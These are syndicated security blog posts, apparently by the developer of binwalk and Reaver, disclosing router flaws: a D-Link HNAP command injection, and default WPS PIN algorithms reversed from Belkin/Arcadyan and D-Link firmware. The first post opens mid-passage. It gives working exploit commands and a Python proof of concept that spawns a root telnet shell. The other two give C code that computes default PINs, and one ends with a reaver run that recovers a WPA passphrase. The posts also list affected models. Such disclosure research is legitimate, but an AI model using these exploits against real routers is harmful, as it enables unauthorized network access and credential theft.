$ wget –header=’SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`"’ http://192.168.0.1/HNAP1
$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is ‘^]’.

BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh)
Enter ‘help’ for a list of built-in commands.

#

If remote administration is enabled, HNAP requests are honored from the WAN, making remote exploitation possible. Of course, the router’s firewall will block any incoming telnet connections from the WAN; a simple solution is to kill off the HTTP server and spawn your telnet server on whatever port the HTTP server was bound to:

$ wget –header=’SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`killall httpd; telnetd -p 8080`"’ http://1.2.3.4:8080/HNAP1
$ telnet 1.2.3.4 8080
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh)
Enter ‘help’ for a list of built-in commands.

#

Note that the wget requests will hang, since cgibin is essentially waiting for telnetd to return. A little Python PoC makes the exploit less awkward:

#!/usr/bin/env python

import sys
import urllib2
import httplib

try:
ip_port = sys.argv[1].split(‘:’)
ip = ip_port[0]

if len(ip_port) == 2:
port = ip_port[1]
elif len(ip_port) == 1:
port = "80"
else:
raise IndexError
except IndexError:
print "Usage: %s <target ip:port>" % sys.argv[0]
sys.exit(1)

url = "http://%s:%s/HNAP1" % (ip, port)
# NOTE: If exploiting from the LAN, telnetd can be started on
# any port; killing the http server and re-using its port
# is not necessary.
#
# Killing off all hung hnap processes ensures that we can
# re-start httpd later.
command = "killall httpd; killall hnap; telnetd -p %s" % port
headers = {
"SOAPAction" : ‘"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"’ % command,
}

req = urllib2.Request(url, None, headers)
try:
urllib2.urlopen(req)
raise Exception("Unexpected response")
except httplib.BadStatusLine:
print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
print "To dump all system settings, run (no quotes): ‘xmldbc -d /var/config.xml; cat /var/config.xml’"
sys.exit(0)
except Exception:
print "Received an unexpected response from the server; exploit probably failed. :("

I’ve tested both the v1.00 and v1.03 firmware (v1.03 being the latest at the time of this writing), and both are vulnerable. But, as is true with most embedded vulnerabilities, this code has snuck its way into other devices as well.
Analyzing “all the firmwares” is tedious, so I handed this bug over to our Centrifuge team at work, who have a great automated analysis system for this sort of thing. Centrifuge found that at least the following devices are also vulnerable:

DAP-1522 revB
DAP-1650 revB
DIR-880L
DIR-865L
DIR-860L revA
DIR-860L revB
DIR-815 revB
DIR-300 revB
DIR-600 revB
DIR-645
TEW-751DR
TEW-733GR

AFAIK, there is no way to disable HNAP on any of these devices.
UPDATE:
Looks like this same bug was found earlier this year by Samuel Huntly, but only reported and patched for the DIR-645. The patch looks pretty shitty though, so expect a follow-up post soon.

Reversing Belkin’s WPS Pin Algorithm

Post Syndicated from Craig original http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/

After finding D-Link’s WPS algorithm, I was curious to see which vendors might have similar algorithms, so I grabbed some Belkin firmware and started dissecting it. This particular firmware uses the SuperTask! RTOS, and in fact uses the same firmware obfuscation as seen previously on the Linksys WRT120N:

DECIMAL HEXADECIMAL DESCRIPTION
——————————————————————————–
0 0x0 Obfuscated Arcadyan firmware, signature bytes: 0x12010920, see https://github.com/devttys0/wrt120n/deobfuscator
666624 0xA2C00 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 454656 bytes

Being a known obfuscation method, binwalk was able to de-obfuscate and extract the compressed firmware image. The next step was to figure out the code’s load address in order to get a proper disassembly in IDA; if the code is disassembled with the wrong load address, absolute memory references won’t be properly resolved.

Absolute addresses in the code can hint at the load address, such as this loop which zeros out the BSS data section:
BSS zero loopBSS zero loop
BSS zeroing loops are usually easy to spot, as they will zero out relatively large regions of memory, and are typically encountered very early on in the code.
Here, the code is filling everything from 0x802655F0 to 0x80695574 with zeros, so this must be a valid address range in memory. Further, BSS is commonly located just after all the other code and data sections; in this case, the firmware image we’ve loaded into IDA is 0x2635EB bytes in size, so we would expect the BSS section to begin somewhere after this in memory:
End of ROMEnd of ROM
In fact, subtracting the size of the firmware image from the start of the BSS section results in a value suspiciously close to 0x800002000:
0x802655F0 – 0x2635EB = 0x800002005
Setting 0x800002000 as the load address in IDA, we get a rather respectable disassembly:
A reasonable disassembly listingA reasonable disassembly listing
With a reasonable disassembly, searching for a WPS pin generation algorithm could begin in ernest. When looking for functions related to generating WPS pins, it’s reasonable to assume that they’ll have to, at some point, calculate the WPS pin checksum. It would be useful to begin the search by first identifying the function(s) responsible for calculating the WPS pin checksum.
However, without a symbol table, finding a function conveniently named “wps_checksum” is not likely; luckily, MIPS C compilers tend to generate a predictable set of immediate values when generating the WPS checksum assembly code, a pattern I noticed when reversing D-Link’s WPS pin algorithm. Using an IDAPython script to search for these immediate values greatly simplifies the process of identifying the WPS checksum function:
WPS pin checksum immediate valuesWPS pin checksum immediate values
There are only a few functions that call wps_checksum, and one of them contains a reference to a very interesting string:
"GenerateDefaultPin"“GenerateDefaultPin”
There’s a lot of xoring and shifting going on in the GenerateDefaultPin code, but what is more interesting is what data it is munging. Looking at the values passed to GenerateDefaultPin, we can see that it is given both the router’s MAC address and serial number:
GenerateDefaultPin((char *buf, int unused, char *mac, char *serial);GenerateDefaultPin(char *buf, int unused, char *mac, char *serial);
MAC addresses are easily gathered by a wireless attacker; serial numbers can be a bit more difficult. Although serial numbers aren’t particularly random, GenerateDefaultPin uses the least significant 4 digits of the serial number, which are unpredictable enough to prevent an external attacker from reliably calculating the WPS pin.
Or, at least that would be the case if the Belkin’s 802.11 probe response packets didn’t include the device’s serial number in its WPS information element:
Belkin probe response packet, captured in WiresharkBelkin probe response packet, captured in Wireshark
Since WiFi probe request/response packets are not encrypted, an attacker can gather the MAC address (the MAC address used by the algorithm is the LAN MAC) and serial number of a target by sending a single probe request packet to a victim access point.
We just need to reverse the GenerateDefaultPin code to determine how it is using the MAC address and serial number to create a unique WPS pin (download PoC here):

/* Used in the Belkin code to convert an ASCII character to an integer */
int char2int(char c)
{
char buf[2] = { 0 };

buf[0] = c;
return strtol(buf, NULL, 16);
}

/* Generates a standard WPS checksum from a 7 digit pin */
int wps_checksum(int pin)
{
int div = 0;

while(pin)
{
div += 3 * (pin % 10);
pin /= 10;
div += pin % 10;
pin /= 10;
}

return ((10 – div % 10) % 10);
}

/* Munges the MAC and serial numbers to create a WPS pin */
int pingen(char *mac, char *serial)
{
#define NIC_NIBBLE_0 0
#define NIC_NIBBLE_1 1
#define NIC_NIBBLE_2 2
#define NIC_NIBBLE_3 3

#define SN_DIGIT_0 0
#define SN_DIGIT_1 1
#define SN_DIGIT_2 2
#define SN_DIGIT_3 3

int sn[4], nic[4];
int mac_len, serial_len;
int k1, k2, pin;
int p1, p2, p3;
int t1, t2;

mac_len = strlen(mac);
serial_len = strlen(serial);

/* Get the four least significant digits of the serial number */
sn[SN_DIGIT_0] = char2int(serial[serial_len-1]);
sn[SN_DIGIT_1] = char2int(serial[serial_len-2]);
sn[SN_DIGIT_2] = char2int(serial[serial_len-3]);
sn[SN_DIGIT_3] = char2int(serial[serial_len-4]);

/* Get the four least significant nibbles of the MAC address */
nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]);
nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]);
nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]);
nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);

k1 = (sn[SN_DIGIT_2] +
sn[SN_DIGIT_3] +
nic[NIC_NIBBLE_0] +
nic[NIC_NIBBLE_1]) % 16;

k2 = (sn[SN_DIGIT_0] +
sn[SN_DIGIT_1] +
nic[NIC_NIBBLE_3] +
nic[NIC_NIBBLE_2]) % 16;

pin = k1 ^ sn[SN_DIGIT_1];

t1 = k1 ^ sn[SN_DIGIT_0];
t2 = k2 ^ nic[NIC_NIBBLE_1];

p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1;
p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2;
p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2];

k1 = k1 ^ k2;

pin = (pin ^ k1) * 16;
pin = (pin + t1) * 16;
pin = (pin + p1) * 16;
pin = (pin + t2) * 16;
pin = (pin + p2) * 16;
pin = (pin + k1) * 16;
pin += p3;
pin = (pin % 10000000) – (((pin % 10000000) / 10000000) * k1);

return (pin * 10) + wps_checksum(pin);
}

Of the 24 Belkin routers tested, 80% of them were found to be using this algorithm for their default WPS pin:
Confirmed vulnerable:

F9K1001v4
F9K1001v5
F9K1002v1
F9K1002v2
F9K1002v5
F9K1103v1
F9K1112v1
F9K1113v1
F9K1105v1
F6D4230-4v2
F6D4230-4v3
F7D2301v1
F7D1301v1
F5D7234-4v3
F5D7234-4v4
F5D7234-4v5
F5D8233-4v1
F5D8233-4v3
F5D9231-4v1

Confirmed not vulnerable:

F9K1001v1
F9K1105v2
F6D4230-4v1
F5D9231-4v2
F5D8233-4v4

It’s not entirely fair to pick on Belkin though, as this appears to be an issue specific to Arcadyan, who is the ODM for many Belkin products, as well as others. This means that there are additional devices and vendors affected besides those listed above.

Reversing D-Link’s WPS Pin Algorithm

Post Syndicated from Craig original http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

While perusing the latest firmware for D-Link’s DIR-810L 80211ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers:
Call to sub_4D56F8 from getWPSPinCodeCall to sub_4D56F8 from getWPSPinCode
I first began examining this particular piece of code with the hopes of controlling part of the format string that is passed to __system. However, this data proved not to be user controllable, as the value placed in the format string is the default WPS pin for the router.

The default WPS pin itself is retrieved via a call to sub_4D56F8. Since the WPS pin is typically programmed into NVRAM at the factory, one might expect sub_4D56F8 to simply be performing some NVRAM queries, but that is not the case:
The beginning of sub_4D56F8The beginning of sub_4D56F8
This code isn’t retrieving a WPS pin at all, but instead is grabbing the router’s WAN MAC address. The MAC address is then split into its OUI and NIC components, and a tedious set of multiplications, xors, and shifts ensues (full disassembly listing here):
Break out the MAC and start munging the NICBreak out the MAC and start munging the NIC
<!–
More NIC munging
–>
While the math being performed is not complicated, determining the original programmer’s intent is not necessarily straightforward due to the assembly generated by the compiler. Take the following instruction sequence for example:
li $v0, 0x38E38E39
multu $a3, $v0

mfhi $v0
srl $v0, 1

Directly converted into C, this reads:

v0 = ((a3 * 0x38E38E39) >> 32) >> 1;

Which is just a fancy way of dividing by 9:

v0 = a3 / 9;

Likewise, most multiplication and modulus operations are also performed by various sequences of shifts, additions, and subtractions. The multu assembly instruction is only used for the above example where the high 32 bits of a product are needed, and there is nary a divu in sight.
However, after translating the entire sub_4D56F8 disassembly listing into a more palatable format, it’s obvious that this code is using a simple algorithm to generate the default WPS pin entirely from the NIC portion of the device’s WAN MAC address:

unsigned int generate_default_pin(char *buf)
{
char *mac;
char mac_address[32] = { 0 };
unsigned int oui, nic, pin;

/* Get a pointer to the WAN MAC address */
mac = lockAndGetInfo_log()->wan_mac_address;

/*
* Create a local, NULL-terminated copy of the WAN MAC (simplified from
* the original code’s sprintf/memmove loop).
*/
sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
mac[1],
mac[2],
mac[3],
mac[4],
mac[5],
mac[6],
mac[7],
mac[8],
mac[9],
mac[10],
mac[11]);

/*
* Convert the OUI and NIC portions of the MAC address to integer values.
* OUI is unused, just need the NIC.
*/
sscanf(mac_address, "%06X%06X", &oui, &nic);

/* Do some XOR munging of the NIC. */
pin = (nic ^ 0x55AA55);
pin = pin ^ (((pin & 0x0F) << 4) +
((pin & 0x0F) << 8) +
((pin & 0x0F) << 12) +
((pin & 0x0F) << 16) +
((pin & 0x0F) << 20));

/*
* The largest possible remainder for any value divided by 10,000,000
* is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
*/
pin = pin % 10000000;

/* The pin needs to be at least 7 digits long */
if(pin < 1000000)
{
/*
* The largest possible remainder for any value divided by 9 is
* 8; hence this adds at most 9,000,000 to the pin value, and at
* least 1,000,000. This guarantees that the pin will be 7 digits
* long, and also means that it won’t start with a 0.
*/
pin += ((pin % 9) * 1000000) + 1000000;
}

/*
* The final 8 digit pin is the 7 digit value just computed, plus a
* checksum digit. Note that in the disassembly, the wps_pin_checksum
* function is inlined (it’s just the standard WPS checksum implementation).
*/
pin = ((pin * 10) + wps_pin_checksum(pin));

sprintf(buf, "%08d", pin);
return pin;
}

Since the BSSID is only off-by-one from the WAN MAC, we can easily calculate any DIR-810L’s WPS pin just from a passive packet capture:

$ sudo airodump-ng mon0 -c 4

CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7 # <— WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: ‘99767389’
[+] WPA PSK: ‘hluig79268’
[+] AP SSID: ‘dlink-B3D6′

But the DIR-810L isn’t the only device to use this algorithm. In fact, it appears to have been in use for some time, dating all the way back to 2007 when WPS was first introduced. The following is an – I’m sure – incomplete list of affected and unaffected devices:
Confirmed Affected:

DIR-810L
DIR-826L
DIR-632
DHP-1320
DIR-835
DIR-615 revs: B2, C1, E1, E3
DIR-657
DIR-827
DIR-857
DIR-451
DIR-655 revs: A3, A4, B1
DIR-825 revs: A1, B1
DIR-651
DIR-855
DIR-628
DGL-4500
DIR-601 revs: A1, B1
DIR-836L
DIR-808L
DIR-636L
DAP-1350
DAP-1555

Confirmed Unaffected:

DIR-815
DIR-505L
DIR-300
DIR-850L
DIR-412
DIR-600
DIR-685
DIR-817LW
DIR-818LW
DIR-803
DIR-845L
DIR-816L
DIR-860L
DIR-645
DIR-685
DAP-1522

Some affected devices, like the DIR-810L, generate the WPS pin from the WAN MAC; most generate it from the BSSID. A stand-alone tool implementing this algorithm can be found here, and has already been rolled into the latest Reaver Pro.